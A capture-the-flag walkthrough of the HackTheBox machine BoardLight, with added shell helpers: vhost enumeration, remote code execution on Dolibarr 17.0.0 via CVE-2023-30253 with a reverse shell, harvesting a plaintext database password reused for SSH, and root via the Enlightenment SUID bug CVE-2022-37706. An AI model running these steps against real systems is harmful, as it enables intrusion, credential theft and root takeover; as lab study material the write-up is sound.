OSCP - HTB - BoardLight
Key takeaways
- vhost brute-forcing
- searching for plaintext passwords
- SUID privilege escalation
Detailed steps
Information gathering
nmap scan
UDP ports come back filtered, and on TCP only 22 (SSH) and 80 (HTTP) are open, so the attack surface is small:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 18:31 EDT
Nmap scan report for 10.10.11.11
Host is up (0.31s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 567.91 ms 10.10.16.1
2 568.20 ms 10.10.11.11
Looking at the page
At the bottom of the page served on port 80 there is a hostname, board.htb.
Add board.htb to /etc/hosts, bound to the target IP (10.10.11.11).
VHOST brute-forcing
Brute-forcing virtual hosts against board.htb (each candidate sent as the Host header) turns up one subdomain, crm.board.htb; add it to /etc/hosts as well:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://board.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: crm.board.htb Status: 200 [Size: 6360]
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================
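The writeup only shows gobuster's output. Below, as an added example that is not part of the original writeup, is the command that matches the banner above (reconstructed from the URL, wordlist, thread count and append-domain setting it prints, so treat it as an assumption), plus a curl-based way to probe a single Host header and a filter that drops candidates whose response looks exactly like the baseline. The filter matters when the server is configured with a wildcard vhost: every Host then returns 200 with the same body, and only size or status differences point at a real vhost. The response sizes in the usage comment are constructed, not measured on board.htb.

```shell
# Added example: vhost enumeration against board.htb (not from the original writeup).

# 1) The gobuster call that produces the banner shown in the writeup (reconstructed, assumed):
#    gobuster vhost -u http://board.htb/ --append-domain -t 10 \
#      -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

# 2) Manual probe: one request per candidate Host header, printing "host status size".
#    Probing a Host that cannot exist first gives the baseline "no such vhost" answer.
vhost_probe() {
    base_url="$1"; host="$2"
    printf '%s ' "$host"
    curl -s -o /dev/null -H "Host: $host" -w '%{http_code} %{size_download}\n' "$base_url"
}

# 3) Filter: print only hosts whose status or size differs from the baseline.
#    Handles the wildcard-vhost case where every name answers 200 with an identical body.
#    stdin lines: "<host> <status> <size>"; args: baseline status, baseline size.
vhost_filter() {
    base_status="$1"; base_size="$2"
    awk -v bs="$base_status" -v bz="$base_size" '$2 != bs || $3 != bz { print $1 }'
}

# Full run (needs board.htb in /etc/hosts pointing at the target):
#   baseline=$(vhost_probe http://board.htb/ "nonexistent-$$.board.htb" | awk '{print $2, $3}')
#   while read -r sub; do vhost_probe http://board.htb/ "$sub.board.htb"; done < wordlist.txt \
#     | vhost_filter $baseline
# Constructed illustration of the filter: with baseline "200 15949", the input
#   www.board.htb 200 15949 / crm.board.htb 200 6360 / mail.board.htb 200 15949
# prints only crm.board.htb.
```

The probe deliberately keeps the URL fixed and varies only the Host header, which is exactly what gobuster's vhost mode does; the DNS name never has to resolve publicly.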
Looking at the new vhost
crm.board.htb is a Dolibarr install that identifies itself as version 17.0.0.
Breaking in
Searching for Dolibarr 17.0.0 turns up two things: the default credentials admin/admin, and an RCE PoC at https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253. CVE-2023-30253 is an authenticated code-execution bug in the Website module: Dolibarr before 17.0.1 rejects PHP code in website pages by looking for the <?php tag, but the check is case-sensitive, so <?PHP is accepted and executed server-side. Any account allowed to edit website pages is enough, which is why the weak admin/admin credentials matter.
Start nc -nlvp 80 locally (binding port 80 needs root on the attacking machine; any port above 1023 works too, as long as the same port is passed to the script), then run the PoC with the target URL, the credentials, and your IP and port. The script asks you to press Ctrl+C once the shell has connected:
┌──(kali㉿kali)-[~/Documents/htb/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253-main]
└─$ python exploit.py http://crm.board.htb admin admin 10.10.16.18 80
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
......
......
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.16.18] from (UNKNOWN) [10.10.11.11] 35874
bash: cannot set terminal process group (867): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
Privilege escalation
Getting the first flag
Looking for passwords
Listing /home shows one user, larissa.
Before anything else, search the web root on port 80 for credentials. Dolibarr keeps its database settings in htdocs/conf/conf.php, and that file holds a plaintext password:
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
......
......
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
......
......
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/conf
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$
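Reading conf.php by hand works when you already know where an application keeps its config. The following is an added example (not from the writeup) of doing the same search generically from a low-privilege shell: find_secrets greps a directory tree for credential-style assignments in the file types web applications usually keep configuration in, and shell_users lists the local accounts with a login shell, which is the list to try a recovered password against. Both functions and their sample inputs are constructed for illustration; the regex is deliberately broad and will need eyeballing.

```shell
# Added example (not from the original writeup): hunting hard-coded credentials
# under a web root, then listing the accounts worth trying them against.

# find_secrets ROOT
#   Prints file:line:text for lines that look like  pass*/secret/token = '...'  or "...".
#   -I skips binaries, -i makes the match case-insensitive, the value must be 4+ chars
#   so empty placeholders such as pass='' are not reported.
find_secrets() {
    root="$1"
    grep -r -E -n -i -I \
        --include='*.php' --include='*.ini' --include='*.env' --include='*.yml' \
        --include='*.yaml' --include='*.json' --include='*.xml' --include='*.conf' \
        -e "(pass(wd|word)?|secret|token)[a-z_]*[[:space:]]*=[[:space:]]*[\"'][^\"']{4,}" \
        "$root" 2>/dev/null
}

# shell_users [PASSWD_FILE]
#   Accounts with a real login shell (default source: /etc/passwd). On BoardLight the
#   database password from conf.php turns out to be reused for one of these users.
shell_users() {
    awk -F: '$7 != "" && $7 !~ /(nologin|false)$/ { print $1 }' "${1:-/etc/passwd}"
}

# Typical use from the www-data shell:
#   find_secrets /var/www/html
#   shell_users
```

Only credentials found this way should be tried for reuse; spraying a single recovered password over the short shell_users list, first with su and then over SSH, is what the next step does by hand.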
Switching users
Quick win: try the database password against the local user, larissa / serverfun2$2023!!, over SSH. It works (the DB account and the OS user share a password), and that gives the first flag:
└─$ ssh larissa@10.10.11.11
larissa@10.10.11.11's password:
Last login: Tue Apr 1 20:13:59 2025 from 10.10.16.18
larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$
Getting the second flag
Among the SUID files, these enlightenment_* binaries stand out, but at this point I didn't know what they were for:
larissa@boardlight:~$ find / -type f -perm -4000 2>/dev/null
......
......
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
......
......
/usr/bin/vmware-user-suid-wrapper
linpeas.sh gives more information about enlightenment: the SUID helpers belong to a version before 0.25.4, which is vulnerable to CVE-2022-37706. Enlightenment (a desktop environment) ships enlightenment_sys as a root SUID wrapper around mount/umount, and in affected versions it hands a caller-controlled path to the mount command without sanitising it, so a crafted path turns into command injection as root. The exploit is at
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 2024 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys ---> Before_0.25.4_(CVE-2022-37706)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd ---> Before_0.25.4_(CVE-2022-37706)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight ---> Before_0.25.4_(CVE-2022-37706)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
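Before running a local privilege-escalation exploit it is worth confirming two things that linpeas only hints at: the full SUID inventory, and which package (and version) each binary belongs to, so the "before 0.25.4" condition can be checked against the installed version rather than guessed from a file date. The block below is an added example, not from the writeup; suid_list wraps the find command used above, and suid_triage adds the dpkg lookup. The expectation that the enlightenment_* helpers map to the enlightenment package is an assumption about this box, not something the writeup shows.

```shell
# Added example (not from the original writeup): SUID triage before reaching for an exploit.

# suid_list [ROOT]
#   SUID regular files under ROOT (default /), one per line, sorted.
#   -xdev keeps find on one filesystem so /proc and bind mounts are not walked.
suid_list() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | sort
}

# suid_triage [ROOT]
#   For each SUID file: path, owning Debian/Ubuntu package, installed version.
#   Files dpkg does not know about are marked "unpackaged"; those deserve a closer look
#   because nothing on the system vouches for them.
suid_triage() {
    suid_list "$1" | while read -r f; do
        pkg=$(dpkg -S "$f" 2>/dev/null | head -n1 | cut -d: -f1)
        if [ -n "$pkg" ]; then
            ver=$(dpkg-query -W -f='${Version}' "$pkg" 2>/dev/null)
            printf '%s\t%s\t%s\n' "$f" "$pkg" "$ver"
        else
            printf '%s\tunpackaged\t-\n' "$f"
        fi
    done
}

# Typical use as larissa:
#   suid_triage | grep -i enlightenment
# Expected (assumption): the enlightenment_* helpers resolve to the enlightenment package,
# and a version below 0.25.4 confirms the CVE-2022-37706 condition linpeas flags.
```

The version check is the part that matters: linpeas labels the binaries from their name alone, and a backported fix would not change the file name or the SUID bit.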
Running the exploit gives root. The "mount: /dev/../tmp/: can't find in /etc/fstab." line is the wrapped mount call failing on the crafted path; the injected command runs right after it and hands back a root shell:
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# cat /root/proof.txt
cat: /root/proof.txt: No such file or directory
# cat /root/root.txt
7cdb7cc19f7b1c6652a2d21a91495fbb
# exit